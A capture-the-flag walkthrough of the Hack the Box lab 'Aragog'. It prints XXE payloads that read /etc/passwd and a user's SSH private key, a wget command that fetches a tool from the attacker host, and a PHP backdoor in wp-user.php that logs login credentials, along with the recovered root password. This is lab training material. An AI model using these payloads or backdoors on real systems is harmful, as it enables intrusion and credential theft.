Today we are going to solve another CTF Challenge “Aragog”. This VM is also developed by Hack the Box, Aragog is a Retired Lab and there are multiple ways to breach into this VM.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they have a static IP. Aragog Lab has IP: 10.10.10.78.
Now, as always let’s begin our hacking with the port enumeration.
C:\Users\jacco>nmap -sC 10.10.10.78 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 18:27 W. Europe Standard Time Nmap scan report for 10.10.10.78 Host is up (0.036s latency). Not shown: 997 closed ports PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.14.15 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh | ssh-hostkey: | 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA) | 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA) |_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519) 80/tcp open http |_http-title: Apache2 Ubuntu Default Page: It works
So we try to connect with FTP through anonymous login. Here I found text.txt file in current directory. Then with the help of get command we downloaded text.txt file in our local machine.
C:\Users\jacco>ftp 10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
200 Always in UTF8 mode.
User (10.10.10.78:(none)): anonymous
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
test.txt
226 Directory send OK.
ftp: 13 bytes received in 0.00Seconds 13.00Kbytes/sec.
ftp> get test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
ftp: 86 bytes received in 0.00Seconds 86.00Kbytes/sec.
ftp>exit
221 Goodbye.
C:\Users\jacco>type test.txt
<details>
<subnet_mask>255.255.255.192</subnet_mask>
<test></test>
</details>
Then we open target IP over web browser but didn’t found any remarkable thing here.
When we found nothing at port 80, then though to use dirbuster for web directory brute-force attack.
Here I found a /host.php file from its result.
When I have explored /host.php in the web browser I found a message “There are 4294967294 possible hosts for” as shown below image. So I search in Google for 4294967294 host which was related to 255.255.255.254 as found in above test.txt file.
It mean we can post test.txt file here with help of burpsuit.
So let’s capture the request and sent the intercepted data into repeater.
As we have predict the test.txt is in XML format so we have tried to validate XXE injection.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/hosts.php" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>hosts.php ( converted from b64)
<?php
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$details = simplexml_import_dom($dom);
$mask = $details->subnet_mask;
//echo "\r\nYou have provided subnet $mask\r\n";
$max_bits = '32';
$cidr = mask2cidr($mask);
$bits = $max_bits - $cidr;
$hosts = pow(2,$bits);
echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";
function mask2cidr($mask){
$long = ip2long($mask);
$base = ip2long('255.255.255.255');
return 32-log(($long ^ $base)+1,2);
}
?>
Luckily we found this is vulnerable to XXE injection.
Hence now I can simply exploit it for fetching /etc/passwd file with help of following XXE script and then check its response.
Our payload:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////etc/issue" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>
or curl
c:\PENTEST\HTB\aragog>type test.txt <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <details> <subnet_mask>&xxe;</subnet_mask> <test></test> </details> c:\PENTEST\HTB\aragog>curl -d @test.txt http://10.10.10.78/hosts.php There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin --snip-- florian:x:1000:1000:florian,,,:/home/florian:/bin/bash cliff:x:1001:1001::/home/cliff:/bin/bash mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false
With the help of /passwd file information we try to get id_rsa through XXE script.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////home/florian/.ssh/id_rsa" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>
Yuppiee! We got the ssh private key successfully, that I copied in text file and named as key.
Then assign permission 600 to saved key (id-rsa) and then try to connect with SSH . You can observe that we get login successfully and accessed the TTY shell of victim’s machine, now let’s find the user.txt
PS C:\PENTEST\HTB\aragog> ssh -i .\floriankey.txt florian@10.10.10.78 Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3 florian@aragog:~$ ls Desktop Documents Downloads Music Pictures Public Templates Videos examples.desktop user.txt florian@aragog:~$ cat user.txt f43*****359
Inside /var/www/html we saw /dev_wiki and it was good to see that this folder holds wordpress setup and configuration files.
So I simply add host IP: 10.10.10.78 and host name: aragog is our local host file which is present inside /etc.
So we explore aragog/dev_wiki in our web browser and got WordPress home page.
As you can observe inside /blog we found a message to Florian from Cliff where he had express the mess of wordpress restoring in very few minutes.
So with help of Google I found a script pspy32s and download it in victim’s VM inside /tmp and also gave execution permission.
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
cd /tmp wget http://10.10.14.6/ pspy32s chmod +x pspy32s
After particular time we realize that there is a cronjob that is frequently deleting the dev_wiki folder & replacing it with the backup folder & a script wp-login.py is ran shortly after that process occurs.
Now let’s manipulate the content of wp-user.php file and place a new php code inside it to enumerate username and password.
backdoor php code added in wp-user.php
<?php
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);
/**
* Fires in the login page header after scripts are enqueued.
*
* @since 2.1.0
*/
do_action ( 'login_form' );
?>
We run some tests & we see that our backdoor works. After some time you see the cleartext login credentials for the administrator account in our log.
florian@aragog:/var/www/html$ cat login.req pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F
This password is encoded by URL, we use Burp decode it, and then we use this password login to root.
florian@aragog:/var/www/html$ su root
Password:!KRgYs(JFO!&MTr)lf
root@aragog:/var/www/html# cat /root/root.txt
9a9*****de6
Author: Jacco Straathof